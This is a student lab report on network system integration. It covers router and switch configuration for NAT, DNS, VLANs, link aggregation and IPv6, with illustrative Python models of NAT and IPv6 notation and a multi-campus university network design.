O 124.126.100.0/24 [110/2] via 100.1.1.2, 00:13:02, GigabitEthernet0/1
O 124.126.200.0/24 [110/3] via 100.1.1.2, 00:11:52, GigabitEthernet0/1
S 192.168.0.0/16 [1/0] via 192.168.10.2
192.168.10.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.10.0/30 is directly connected, GigabitEthernet0/0
L 192.168.10.1/32 is directly connected, GigabitEthernet0/0
O 202.96.137.0/24 [110/3] via 100.1.1.2, 00:00:33, GigabitEthernet0/1
r1#
Public network: 3. The public PC can reach the HTTP service on port 80 of the intranet HTTP-SERVER through port 8080 on R1
Access to the server (172.16.1.10/24) from the intranet works normally
Configure the route on R1
r1(config)#ip route 172.16.1.0 255.255.255.0 192.168.10.2
The router can now ping the intranet server:

Configure NAT:
r1(config)#int g0/0
r1(config-if)#ip nat inside
r1(config-if)#int g0/1
r1(config-if)#ip nat outside
r1(config)#ip nat inside source static tcp 172.16.1.10 80 100.1.1.1 8080
Test access:
Public PC:
IP address: 124.126.200.11
Subnet mask: 255.255.255.0
Default gateway: 124.126.200.254
DNS server: 113.100.2.56

Access works:

Public network: 4. There is a public server HTTP-SERVER at 124.126.200.10/24; intranet users need to be able to reach it. (R1 and R2 use the 124.126.100.0/24 segment)
(R1 and R2 use the 124.126.100.0/24 segment): this sentence is ignored.
IP configuration:
IP address: 124.126.200.10
Subnet mask: 255.255.255.0
Default gateway: 124.126.200.254
DNS server: 113.100.2.56
r1(config)#access-list 10 permit 192.168.0.0 0.0.255.255
r1(config)#ip nat inside source list 10 interface g0/1 overload
Access works now!
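The two NAT rules on R1 (the static TCP port-forward for the intranet web server and the PAT overload for list 10) can be replayed on constructed packets. The Python model below is an added example, not R1's implementation; it assumes PAT hands out ports from 1024 upward and ignores timeouts and protocols other than TCP.

```python
import ipaddress
from dataclasses import dataclass, replace

# Constructed model (added example, not R1's software) of the two NAT rules above:
#   ip nat inside source static tcp 172.16.1.10 80 100.1.1.1 8080
#   ip nat inside source list 10 interface g0/1 overload   (list 10 = 192.168.0.0/16)
OUTSIDE_ADDR = "100.1.1.1"                               # R1 g0/1
STATIC_TCP = {("100.1.1.1", 8080): ("172.16.1.10", 80)}  # (outside) -> (inside)
NAT_LIST_10 = [ipaddress.ip_network("192.168.0.0/16")]   # sources allowed to use PAT
FIRST_PAT_PORT = 1024                                     # assumed ephemeral range start


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int


class NatBox:
    """Static TCP port-forward plus PAT overload on one public address."""

    def __init__(self):
        self.table = {}                 # (inside addr, inside port) -> outside port
        self.next_port = FIRST_PAT_PORT

    def inside_to_outside(self, pkt):
        """Packet entering on g0/0 (ip nat inside) and leaving on g0/1.

        Returns the packet as seen on the outside; unchanged if no rule applies
        (the private source then leaks out and no reply can find its way back)."""
        # Replies from the forwarded server port are rewritten back to 100.1.1.1:8080.
        for (o_addr, o_port), (i_addr, i_port) in STATIC_TCP.items():
            if (pkt.src, pkt.sport) == (i_addr, i_port):
                return replace(pkt, src=o_addr, sport=o_port)
        src = ipaddress.ip_address(pkt.src)
        if not any(src in net for net in NAT_LIST_10):
            return pkt  # e.g. 172.16.1.10 itself: list 10 only matches 192.168.0.0/16
        key = (pkt.src, pkt.sport)
        if key not in self.table:       # allocate a new PAT port on first use
            self.table[key] = self.next_port
            self.next_port += 1
        return replace(pkt, src=OUTSIDE_ADDR, sport=self.table[key])

    def outside_to_inside(self, pkt):
        """Packet arriving on g0/1 addressed to R1's public address.

        Returns the translated packet, or None when no static or dynamic mapping
        exists (an unsolicited packet to 100.1.1.1 has no inside destination)."""
        if (pkt.dst, pkt.dport) in STATIC_TCP:
            i_addr, i_port = STATIC_TCP[(pkt.dst, pkt.dport)]
            return replace(pkt, dst=i_addr, dport=i_port)
        for (i_addr, i_port), o_port in self.table.items():
            if (pkt.dst, pkt.dport) == (OUTSIDE_ADDR, o_port):
                return replace(pkt, dst=i_addr, dport=i_port)
        return None
```

Two consequences of the configuration show up directly: only the mapped port 8080 is exposed (a packet to port 80 on 100.1.1.1 has no inside target), and the server's own outbound traffic is never translated because list 10 does not cover 172.16.1.0/24.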
Public network: 5. There is a public DNS-SERVER at 113.100.2.56/24 with gateway 113.100.2.1/24; we ultimately want to reach the public http-server via the domain www.shixun.com and view the home page "a small page", whose content reads: welcome to study our course!
R2:
r2>en
r2#conf t
Enter configuration commands, one per line. End with CNTL/Z.
r2(config)#int g0/2
r2(config-if)#
r2(config-if)#ip address 113.100.2.1 255.255.255.0
r2(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/2, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/2, changed state to up
# configure OSPF
r2(config-if)# router ospf 1
r2(config-router)#network 113.100.2.0 0.0.0.255 area 1
Configure the DNS server:
DNS server IP: 113.100.2.56/24 via 113.100.2.1

Configure the domain name:
www.shixun.com


Test access:

Access succeeds; now modify the HTML
HTML content
index.html
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>首页 - 欢迎来到实训课程</title>
</head>
<body>
<div class="container">
<h1>欢迎来到实训课程首页</h1>
<p>点击下面的链接查看详细信息:</p>
<a href="a_small_page.html">进入课程页面(a_small_page)</a>
<a>疯狂星期5组奉献</a>
</div>
</body>
</html>
a_small_page.html
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>课程详情 - 欢迎学习我们的课程</title>
</head>
<body>
<div class="container">
<h1>欢迎学习我们的课程!</h1>
<p>Welcome to study our course!</p>
<a href="index.html">返回首页</a>
<a>疯狂星期5组奉献</a>
</div>
</body>
</html>
Result


Branch:
Branch: 1. Intranet PC7 and PC8 are in vlan70 and vlan80 respectively
Branch: 2. The gateways of PC7 and PC8 are 192.168.70.254 and 192.168.80.254 respectively, and the gateways are located on router R4
Switch>
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#
Switch(config)#hostname branch
branch(config)#vlan 70
branch(config-vlan)#int vlan 70
branch(config-if)#
%LINK-5-CHANGED: Interface Vlan70, changed state to up
branch(config-if)#ip addr 192.168.70.254 255.255.255.0
branch(config-if)#vlan 80
branch(config-vlan)#int vlan 80
branch(config-if)#
%LINK-5-CHANGED: Interface Vlan80, changed state to up
branch(config-if)#ip addr 192.168.80.254 255.255.255.0
branch(config-if)#
branch(config-if)#vlan 600
branch(config-vlan)#int vlan 600
branch(config-if)#
%LINK-5-CHANGED: Interface Vlan600, changed state to up
branch(config-if)#ip addr 10.10.10.2 255.255.255.252
branch(config-if)#i
branch(config-if)#int fa0/2
branch(config-if)#sw mode acc
branch(config-if)#sw acc vlan 70
branch(config-if)#
%LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan70, changed state to up
branch(config-if)#no shut
branch(config-if)#
branch(config-if)#int fa0/3
branch(config-if)#sw mode acc
branch(config-if)#sw acc vlan 80
branch(config-if)#
LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan80, changed state to up
branch(config-if)#no shut
branch(config-if)#
branch(config-if)#int f0/1
branch(config-if)#
branch(config-if)#sw mode acc
branch(config-if)#sw acc vlan 600
branch(config-if)#no shut
branch(config-if)#
branch(config-if)#ip route 0.0.0.0 0.0.0.0 10.10.10.1
branch(config)#ip routing
Branch: 3. PC7 and PC8 must also be able to reach the external network (test by accessing the public HTTP-SERVER)
PC7:
IP address: 192.168.70.10
Subnet mask: 255.255.255.0
Default gateway: 192.168.70.254
DNS server: 113.100.2.56
PC8:
IP address: 192.168.80.10
Subnet mask: 255.255.255.0
Default gateway: 192.168.80.254
DNS server: 113.100.2.56

R4:
r4(config)#int g0/1
r4(config-if)#ip addr 10.10.10.1 255.255.255.252
r4(config-if)#no shut
PC8 <-> PC7 mutual access

Configure access:
branch(config)#ip route 0.0.0.0 0.0.0.0 10.10.10.1
r4(config)#int g0/1
r4(config-if)#ip addr 10.10.10.1 255.255.255.252
r4(config-if)#no shut
r4(config)#access-list 100 permit ip 192.168.70.0 0.0.0.255 any
r4(config)#access-list 100 permit ip 192.168.80.0 0.0.0.255 any
r4(config)#int g0/1
r4(config-if)#ip nat inside
r4(config-if)#int g0/0
r4(config-if)#ip nat outside
r4(config-if)#ip nat inside source list 100 interface g0/0 overload
r4(config)#ip route 192.168.70.0 255.255.255.0 10.10.10.2
r4(config)#ip route 192.168.80.0 255.255.255.0 10.10.10.2
r4(config)#do show ip int br
Interface IP-Address OK? Method Status Protocol
GigabitEthernet0/0 202.96.137.2 YES manual up up
GigabitEthernet0/1 10.10.10.1 YES manual up up
GigabitEthernet0/2 unassigned YES unset administratively down down
Vlan1 unassigned YES unset administratively down down
r4(config)#
r4(config)#router ospf 1
r4(config-router)#do show ip ospf neighbor
Neighbor ID Pri State Dead Time Address Interface
202.96.137.1 1 FULL/DR 00:00:30 202.96.137.1 GigabitEthernet0/0
r4(config-router)#
r4(config-router)#network 202.96.137.0 0.0.0.255 area 0
Test
PC7 access succeeds


PC8 access succeeds


Files
https://p.dabbit.net/blog/pic_bed/sharex/_pn-2024-06-27-15-48-28_Marten_Infatuated_Delirious.rar
Fundamentals of Network System Integration (lab sessions): Lab 7
Company and Campus Network Design 1
Lab content:
1. Switch and router link aggregation lab
2. IPv6 basics lab.
3. Based on the customer requirements analysis for the company network in the earlier labs, complete the network planning and technical design for those requirements and produce a company network system integration design (2000 computers), with headquarters and branch in two different cities.
Lab report:
Must be completed independently; the report must include the simulator configuration files
Use the Huawei or Cisco simulator
Lab 1: Link aggregation
Topology

STP state before configuration

[Huawei]dis stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet0/0/1 ROOT FORWARDING NONE
0 GigabitEthernet0/0/2 ALTE DISCARDING NONE
0 GigabitEthernet0/0/3 ALTE DISCARDING NONE
0 GigabitEthernet0/0/4 DESI LEARNING NONE
[Huawei]
Configuration
[Huawei]undo info-center enable
[Huawei]int Eth-Trunk 1
[Huawei-Eth-Trunk1]int g0/0/1
[Huawei-GigabitEthernet0/0/1]eth-trunk 1
[Huawei-GigabitEthernet0/0/1]int g0/0/2
[Huawei-GigabitEthernet0/0/2]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/2]int g0/0/3
[Huawei-GigabitEthernet0/0/3]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/3]
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int Eth-Trunk 1
[Huawei-Eth-Trunk1]int g0/0/1
[Huawei-GigabitEthernet0/0/1]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/1]int g0/0/2
[Huawei-GigabitEthernet0/0/2]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/2]int g0/0/3
[Huawei-GigabitEthernet0/0/3]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/3]
Check the state:
[Huawei-GigabitEthernet0/0/3]dis stp b
MSTID Port Role STP State Protection
0 GigabitEthernet0/0/4 DESI FORWARDING NONE
0 Eth-Trunk1 ROOT FORWARDING NONE
[Huawei-GigabitEthernet0/0/3]
Ping succeeds
PC1
PC2

No packets on int g0/0/1.

Capturing on all three interfaces shows that only the last one carries traffic.

Configuration
[Huawei-GigabitEthernet0/0/3]dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface MEth0/0/1
#
interface Eth-Trunk1
#
interface GigabitEthernet0/0/1
eth-trunk 1
#
interface GigabitEthernet0/0/2
eth-trunk 1
#
interface GigabitEthernet0/0/3
eth-trunk 1
#
interface GigabitEthernet0/0/4
#
...
#
interface GigabitEthernet0/0/23
#
interface GigabitEthernet0/0/24
#
interface NULL0
#
user-interface con 0
user-interface vty 0 4
#
return
[Huawei-GigabitEthernet0/0/3]
Lab 2: IPv6 basics
Background
IPv6 addresses can be written in three notations:
- Colon-separated hexadecimal notation
  The format is X:X:X:X:X:X:X:X, where each X is 16 bits of the address written in hexadecimal. For example:
  ABCD:EF01:2345:6789:ABCD:EF01:2345:6789
  In this notation the leading zeros of each X may be omitted, for example:
  2001:0DB8:0000:0023:0008:0800:200C:417A → 2001:DB8:0:23:8:800:200C:417A
- Zero compression notation
  If an IPv6 address contains a long run of consecutive zeros, that run can be compressed to ::. To keep address parsing unambiguous, :: may appear only once in an address. For example:
  FF01:0:0:0:0:0:0:1101 → FF01::1101
  0:0:0:0:0:0:0:1 → ::1
  0:0:0:0:0:0:0:0 → ::
- Embedded IPv4 address notation
  For IPv4-IPv6 interoperation an IPv4 address can be embedded in an IPv6 address, usually written X:X:X:X:X:X:d.d.d.d: the first 96 bits in colon-separated hexadecimal and the last 32 bits in IPv4 dotted decimal. For example:
  ::192.168.0.1
  ::FFFF:192.168.0.1
  Note that zero compression still applies within the first 96 bits.
Notes on some special addresses:
Note 1: ::1 is the loopback address, like IPv4's 127.x.x.x
Note 2: :: corresponds to IPv4's 0.0.0.0
Note 3: addresses beginning with FF are IPv6 multicast addresses; for example FF::5 is similar to IPv4's 224.0.0.5
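The three notations above can be implemented directly. The following Python is an added example (not from the lab or the textbook): `expand` parses any of the three forms into eight 16-bit groups and rejects a second `::`, `compress` produces the canonical zero-compressed form, and `with_embedded_ipv4` renders the last 32 bits as dotted decimal while still compressing the first 96 bits; the result is cross-checked against the standard library.

```python
import ipaddress


def expand(addr):
    """Return the eight 16-bit groups of an IPv6 address as 4-digit lowercase hex.

    Accepts omitted leading zeros, a single '::' run and an embedded dotted
    IPv4 address in the last 32 bits (the three notations described above)."""
    if addr.count("::") > 1:
        raise ValueError("'::' may appear only once: " + addr)
    if "." in addr:  # fold a trailing d.d.d.d into two hexadecimal groups
        head, _, v4 = addr.rpartition(":")
        octets = [int(o) for o in v4.split(".")]
        if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
            raise ValueError("bad embedded IPv4 address: " + v4)
        addr = head + ":%x:%x" % (octets[0] << 8 | octets[1], octets[2] << 8 | octets[3])
    if "::" in addr:
        left, right = addr.split("::")
        lg = left.split(":") if left else []
        rg = right.split(":") if right else []
        groups = lg + ["0"] * (8 - len(lg) - len(rg)) + rg
    else:
        groups = addr.split(":")
    if len(groups) != 8 or any(not 1 <= len(g) <= 4 for g in groups):
        raise ValueError("not a valid IPv6 address: " + addr)
    return ["%04x" % int(g, 16) for g in groups]


def _compress_groups(groups):
    """Join groups with leading zeros dropped and the longest run of two or more
    zero groups replaced by '::' (the leftmost run on a tie, as RFC 5952 requires)."""
    groups = [g.lstrip("0") or "0" for g in groups]
    best_start, best_len, run_start = -1, 0, None
    for i, g in enumerate(groups + ["end"]):  # sentinel closes a trailing run
        if g == "0":
            if run_start is None:
                run_start = i
        else:
            if run_start is not None and i - run_start > best_len:
                best_start, best_len = run_start, i - run_start
            run_start = None
    if best_len < 2:
        return ":".join(groups)
    left = ":".join(groups[:best_start])
    right = ":".join(groups[best_start + best_len:])
    return left + "::" + right


def compress(addr):
    """Canonical compressed text form of an IPv6 address written in any notation."""
    return _compress_groups(expand(addr))


def with_embedded_ipv4(addr):
    """X:X:X:X:X:X:d.d.d.d form: first 96 bits compressed, last 32 bits dotted decimal."""
    groups = expand(addr)
    low32 = int(groups[6] + groups[7], 16)
    v4 = ".".join(str((low32 >> s) & 0xFF) for s in (24, 16, 8, 0))
    prefix = _compress_groups(groups[:6])
    return prefix + ("" if prefix.endswith("::") else ":") + v4


def is_valid(addr):
    """True when expand() accepts the address."""
    try:
        expand(addr)
        return True
    except ValueError:
        return False


def matches_stdlib(addr):
    """Cross-check: our canonical form equals the standard library's."""
    return compress(addr) == str(ipaddress.IPv6Address(addr))
```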
Topology

IPv6 assignment
| Device | Interface | IPv6 address | Subnet prefix |
|---|---|---|---|
| PC1 | Eth0/1 | 2001:db8:acad:1::10/64 | 2001:db8:acad:1::/64 |
| R1 | GE0/1 | 2001:db8:acad:1::1/64 | 2001:db8:acad:1::/64 |
| R1 | GE0/2 | 2001:db8:acad:2::1/64 | 2001:db8:acad:2::/64 |
| R2 | GE0/1 | 2001:db8:acad:2::2/64 | 2001:db8:acad:2::/64 |
| R2 | GE0/2 | 2001:db8:acad:3::1/64 | 2001:db8:acad:3::/64 |
| PC2 | Eth0/1 | 2001:db8:acad:3::10/64 | 2001:db8:acad:3::/64 |
Configuration:
- PC1 and R1 are connected on the 2001:db8:acad:1::/64 subnet
- R1 and R2 are linked over the 2001:db8:acad:2::/64 subnet
- PC2 connects to R2 on the 2001:db8:acad:3::/64 subnet
Routing configuration:
R1:
[Huawei]ipv6 route-static 2001:db8:acad:3:: 64 2001:db8:acad:2::2
R2:
[Huawei]ipv6 route-static 2001:db8:acad:1:: 64 2001:db8:acad:2::1
Configuration
PC1:

PC2:
R1
<Huawei>SYS
Enter system view, return user view with Ctrl+Z.
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]ipv6
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ipv6 enable
[Huawei-GigabitEthernet0/0/0]ipv6 add 2001:db8:acad:1::1 64
[Huawei-GigabitEthernet0/0/0]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ipv6 enable
[Huawei-GigabitEthernet0/0/1]ipv6 address 2001:db8:acad:2::1 64
R2
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]ipv6
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ipv6 enable
[Huawei-GigabitEthernet0/0/0]ipv6 addr 2001:db8:acad:2::2 64
[Huawei-GigabitEthernet0/0/0]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ipv6 enable
[Huawei-GigabitEthernet0/0/1]ipv6 addr 2001:db8:acad:3::1 64
[Huawei-GigabitEthernet0/0/1]
Routing configuration:
R1:
[Huawei]ipv6 route-static 2001:db8:acad:3:: 64 2001:db8:acad:2::2
Default route:
ipv6 route-s :: 0 2001:db8:acad:2::2
R2:
[Huawei]ipv6 route-static 2001:db8:acad:1:: 64 2001:db8:acad:2::1
Default route:
ipv6 route-s :: 0 2001:db8:acad:2::1
Test
Ping succeeds.
Packet capture

Configuration
R1
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
ipv6
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ipv6 enable
ipv6 address 2001:DB8:ACAD:1::1/64
#
interface GigabitEthernet0/0/1
ipv6 enable
ipv6 address 2001:DB8:ACAD:2::1/64
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ipv6 route-static :: 0 2001:DB8:ACAD:2::2
ipv6 route-static 2001:DB8:ACAD:3:: 64 2001:DB8:ACAD:2::2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]
[Huawei]
R2
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
ipv6
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ipv6 enable
ipv6 address 2001:DB8:ACAD:2::2/64
#
interface GigabitEthernet0/0/1
ipv6 enable
ipv6 address 2001:DB8:ACAD:3::1/64
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ipv6 route-static :: 0 2001:DB8:ACAD:2::1
ipv6 route-static 2001:DB8:ACAD:1:: 64 2001:DB8:ACAD:2::1
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]
3. Based on the customer requirements analysis for the company network in the earlier labs, complete the network planning and technical design for those requirements and produce a company network system integration design (2000 computers), with headquarters and branch in two different cities.
Requirements analysis: Shandong University of Science and Technology
1. Customer requirements analysis
Shandong University of Science and Technology has a Qingdao campus (the main campus), a Taian campus and a Jinan campus, and needs a campus network covering about 2000 computers. The main requirements are:
- High-speed, secure and stable interconnection between the three campuses, using either IPsec VPN or leased carrier lines.
- The network must be divided into segments such as a server segment, teaching segment, office segment and student dormitory segment, isolated from each other yet able to communicate.
- Each campus must be further subdivided into subnets (teaching buildings, laboratories, machine rooms, etc.) with clear responsibilities and boundaries that are easy to manage.
- The network should scale well, making later upgrades and the connection of new buildings easy.
- Comprehensive security measures such as firewalls, intrusion detection and anti-virus protection should be provided to keep the campus network safe.
- The network must be easy to manage and maintain; a set of network management hardware and software is needed for centralized control, operations and troubleshooting.
2. Network topology design
Based on the requirements, this design uses a three-tier tree topology.
- Core layer: two high-performance layer-3 core switches in the Qingdao main campus machine room, with VRRP for redundancy, connecting the three campuses and the egress.
- Aggregation layer: two Ethernet switches in each campus machine room as regional aggregation switches, uplinked to the core over bundled redundant links; they aggregate the buildings of each campus.
- Access layer: two Ethernet switches per building as access switches, dual-homed to the aggregation layer with MSTP for link backup; they connect the terminals on each floor.
- Servers connect to the core switches with dual NICs for load balancing and high availability.
- The management platform and security appliances are deployed in the core machine room and attach directly to the core layer.
- Campuses are connected via IPsec VPN or leased lines and interconnected through the core switches.
3. IP address planning
Based on the information provided, this design lays out a unified IP address plan for the campus network.
- 172.16.0.0/22 is allocated to the Qingdao main campus.
- 172.16.0.0/24 is used for servers.
- 172.16.1.0/24 is used for network management.
- 172.16.2.0/24 and 172.16.3.0/24 are used for offices and teaching.
- 172.30.0.0/16 is allocated to the Taian campus.
- 172.30.0.0/24 is used for network device interconnection.
- 172.30.132.0/24 is assigned to the 1C401-1C403 machine rooms.
- 172.30.128.0/24 is assigned to the 1B machine room.
- Other subnets within 172.30.0.0/16 are available for teaching buildings, office buildings, laboratories, etc.
- 172.29.0.0/16 is allocated to the Jinan campus, subdivided in the same way as Taian.
- 10.0.0.0/24 and 192.168.0.0/24 serve as device management segments and are not exposed externally.
4. Equipment selection
- Core switches: Huawei CE12800 series high-end routing switches with high-capacity power supplies, main control engines, line cards and copper ports, deployed as a hot-standby pair.
- Aggregation switches: Huawei S5720-56C-HI-48S series with 48 10GE SFP+ ports and 4 40G QSFP+ uplinks.
- Access switches: Huawei S5720-28X-SI-24S-AC series with 24 GE SFP ports and 4 10GE SFP+ uplinks.
- Servers and storage: Huawei FusionServer and OceanStor series; detailed configuration omitted.
- VPN gateway: Huawei USG6680 firewall as the IPsec VPN gateway.
- Internet behaviour management: Shanghai Hengyang iNBox ACG-5000E centrally managed internet behaviour management appliance.
- Management workstation: Sugon Tiankuo I620-G30 workstation running Windows Server with the management software.
5. Network security design
This design provides fairly complete security measures:
- Deploy the USG6680 next-generation firewall for IPS, IDS, AV, URL filtering and other security functions.
- The iNBox ACG-5000E identifies, filters and controls HTTP, HTTPS, SSH and other traffic across the network.
- Change the default settings on all network devices, configure strong-password AAA authentication, and allow management logins only from specific management IPs.
- Enable DHCP snooping, DAI, IP source guard and other layer-3 device security features.
- Deploy the LanScope Net endpoint admission system for security checks and admission control of connecting terminals.
- Establish security management rules, assign responsible persons, and carry out regular security assessments.
6. Network management design
For unified control of the whole network, this design provides a complete management system:
- Huawei eSight for centralized configuration, monitoring and maintenance of network devices, servers and storage.
- The Zhuoxun unified operations management system, combining ticketing, CMDB and monitoring modules, for automated network operations.
- Splunk for centralized log management, collecting and analysing logs from the core network and security devices.
- The Huawei iMaster NCE intelligent analysis platform, using big data and AI for intelligent network analysis and fault diagnosis.
- NETCONF, YANG and similar management protocols and data modelling languages for programmable network automation.
- A centralized network management centre staffed 7x24 by professional administrators for daily inspection, change management and fault handling.
Next, the plan needs further discussion and refinement, including feasibility analysis, budget and construction schedule. During implementation, close cooperation with the university's departments is needed for surveying, construction, training and acceptance. We look forward to implementing this plan together with the university to support its digital transformation and high-quality development.
VLAN planning
Further refine the design of the campus network, in particular the VLAN division, IP address plan and topology. The revised detailed plan follows:
1. VLAN planning and IP address allocation
For security isolation and flexible management, the campus network is divided extensively into VLANs, each VLAN corresponding to one IP subnet.
- Qingdao campus VLAN plan
| VLAN ID | IP subnet | Mask | Description | Gateway |
|---|---|---|---|---|
| VLAN 10 | 172.16.0.0 | 255.255.255.0 | Server segment | 172.16.0.254 |
| VLAN 20 | 172.16.1.0 | 255.255.255.0 | Management segment | 172.16.1.254 |
| VLAN 30 | 172.16.2.0 | 255.255.255.0 | Office segment 1 | 172.16.2.254 |
| VLAN 40 | 172.16.3.0 | 255.255.255.0 | Office segment 2 | 172.16.3.254 |
| VLAN 50 | 172.16.4.0 | 255.255.255.0 | Teaching segment 1 | 172.16.4.254 |
| VLAN 60 | 172.16.5.0 | 255.255.255.0 | Teaching segment 2 | 172.16.5.254 |
| VLAN 70 | 172.16.6.0 | 255.255.255.0 | Dormitory segment 1 | 172.16.6.254 |
| VLAN 80 | 172.16.7.0 | 255.255.255.0 | Dormitory segment 2 | 172.16.7.254 |
| VLAN 90 | 172.16.8.0 | 255.255.255.0 | Guest segment | 172.16.8.254 |
| VLAN 100 | 172.16.9.0 | 255.255.255.0 | Printer segment | 172.16.9.254 |
| VLAN 110 | 172.16.10.0 | 255.255.255.0 | IP phone segment | 172.16.10.254 |
| VLAN 120 | 172.16.11.0 | 255.255.255.0 | Surveillance segment | 172.16.11.254 |
| VLAN 130 | 172.16.12.0 | 255.255.255.0 | Wireless AP management segment | 172.16.12.254 |
| VLAN 1000 | 10.0.0.0 | 255.255.255.0 | Device interconnect | - |
The Qingdao campus has 13 user VLANs and 1 core VLAN, enough to separate the business systems. Every VLAN uses a subnet of 172.16.0.0/16 with mask 255.255.255.0. VLAN 1000 carries no IP address and is dedicated to interconnecting layer-3 devices.
The server zone, including the academic affairs system, OA, library, VOD, IPTV, DNS, DHCP, e-mail and other core business servers, is placed in VLAN 10 on 172.16.0.0/24.
The management platform, including the NMS server, log server and accounting server, is placed in VLAN 20 on 172.16.1.0/24.
Office areas in the various teaching buildings are placed in VLAN 30 or 40 by location, on 172.16.2.0/24 and 172.16.3.0/24 respectively. The number of office VLANs can be adjusted later.
Laboratory areas in the teaching buildings are placed in VLAN 50 or 60 by teaching requirement, on 172.16.4.0/24 and 172.16.5.0/24 respectively. Teaching and office areas are isolated by VLAN.
Student dormitory buildings are placed in VLAN 70 or 80, on 172.16.6.0/24 and 172.16.7.0/24 respectively. The number of dormitory VLANs can be adjusted.
Other supporting networks such as guest, printing, voice, video surveillance and wireless management each get their own VLAN so they do not interfere with each other.
Each VLAN has a layer-3 SVI terminated on the core switch, which provides the gateway and routes between VLANs.
- Taian campus VLAN plan
| VLAN ID | IP subnet | Mask | Description | Gateway |
|---|---|---|---|---|
| VLAN 10 | 172.30.0.0 | 255.255.255.0 | Device management segment | - |
| VLAN 20 | 172.30.128.0 | 255.255.255.0 | 1B machine room | 172.30.128.254 |
| VLAN 30 | 172.30.132.0 | 255.255.255.0 | 1C401 machine room | 172.30.132.254 |
| VLAN 40 | 172.30.133.0 | 255.255.255.0 | 1C402 machine room | 172.30.133.254 |
| VLAN 50 | 172.30.134.0 | 255.255.255.0 | 1C403 machine room | 172.30.134.254 |
| VLAN 60 | 172.30.135.0 | 255.255.255.0 | Information centre office | 172.30.135.254 |
| VLAN 70 | 172.30.136.0 | 255.255.255.0 | Main building office | 172.30.136.254 |
| VLAN 80 | 172.30.137.0 | 255.255.255.0 | Library | 172.30.137.254 |
| VLAN 90 | 172.30.144.0 | 255.255.240.0 | Dormitories 1-15 | 172.30.144.254 |
| VLAN 100 | 172.30.160.0 | 255.255.240.0 | Dormitories 16-30 | 172.30.160.254 |
| VLAN 110 | 172.30.176.0 | 255.255.240.0 | Teaching buildings 1-3 | 172.30.176.254 |
| VLAN 120 | 172.30.208.0 | 255.255.240.0 | Teaching buildings 4-6 | 172.30.208.254 |
| VLAN 130 | 172.30.192.0 | 255.255.240.0 | Teaching laboratories | 172.30.192.254 |
泰安校区根据建筑物和业务类型划分VLAN,核心交换机通过三层SVI为各VLAN提供网关。共划分13个VLAN,分配有172.30.0.0/16网段的13个子网。
1B机房接入VLAN 20,1C401-403机房分别接入VLAN 30-50,IP地址连续分配。
办公区划分为三个VLAN,分属信息中心、主楼、图书馆,互不影响。
学生宿舍划分两个VLAN,每个VLAN掩码为255.255.240.0,可用地址4094个,1-15栋和16-30栋宿舍分属两个VLAN。
教学区根据教学楼栋号划分为三个VLAN,1-3栋、4-6栋、实验室各一个VLAN,互不影响。每个VLAN掩码为255.255.240.0,保证充足的IP地址。
VLAN 10专用于网络设备管理,不分配IP地址。
- 济南校区VLAN规划
